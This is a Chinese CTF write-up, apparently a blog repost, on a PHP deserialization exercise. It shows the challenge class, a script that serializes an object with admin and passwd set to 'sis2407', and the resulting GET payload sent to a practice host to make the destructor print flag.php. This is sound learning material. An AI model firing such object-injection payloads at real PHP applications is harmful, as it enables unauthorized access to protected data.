当前位置: 首页 > article >正文

反序列化漏洞练习2

article 2025/1/12 16:13:12

拿到题目,发现目标是获得flag.php的内容,且sis中admin和passwd等于sis2407时会输出fag的内容

根据源码编写序列化代码

 <?php 
error_reporting(0);
class sis{
    public $admin;
    public $passwd;
    public function __construct(){
        $this->admin ="sis2407";
        $this->passwd = "sis2407";
    }
        public function __destruct(){
        if($this->admin === "sis2407" && $this->passwd === "sis2407"){
            include("flag.php");
            echo $flag;
        }else{
            echo $this->admin;
            echo $this->passwd;
            echo "Just a bit more!";
        }
    }
}
$a=new sis;
echo serialize($a);
?>

得到序列化的sis,将序列化后的sis以get的方式为sis传参

124.221.58.83:81/s2.php?sis=O:3:"sis":2:{s:5:"admin";s:7:"sis2407";s:6:"passwd";s:7:"sis2407";}


http://www.kler.cn/a/301520.html

相关文章:

  • 使用vue-pdf预览pdf和解决pdf电子签章显示问题
  • Kafka核心参数与使用02
  • linux 设置mysql 外网访问
  • “深入浅出”系列之FFmpeg:(1)音视频开发基础
  • 4 $ 符号
  • Erlang语言的网络编程
  • python 实现判断IP4地址是否有效算法
  • MongoDB延迟查询
  • chapter14-集合——(List-Map)——day18
  • ctfshow-文件包含
  • JavaEE:多线程进阶(线程安全的集合类)
  • Python实现Paillier同态加密算法
  • JavaWeb开发中为什么Controller里面的方法是@RequestMapping?
  • 张力控制器的原理
  • 【2023年】云计算金砖牛刀小试3
  • 《C++枚举类型的进化:从传统到现代的飞跃》
  • SAP B1 学习笔记 - 易混淆字段名(持续更新中)
  • 【c/c++】类型转换:隐式类型转换、强制类型转换
  • Vue - 关于Router路由跳转时显示的animate.css动画
  • ffmpeg使用安装使用教程(命令行-Python)
  • 后端Web之SpringBoot原理
  • Ubuntu 22.04 系统中 ROS2安装
  • 复仇时刻 华为的狙击还没结束
  • JAVA 使用POI实现单元格行合并生成
  • Spring Boot 四大请求编码模板(GET、POST、PUT、DELETE)
  • eureka服务开启之后的默认登录账号密码是什么?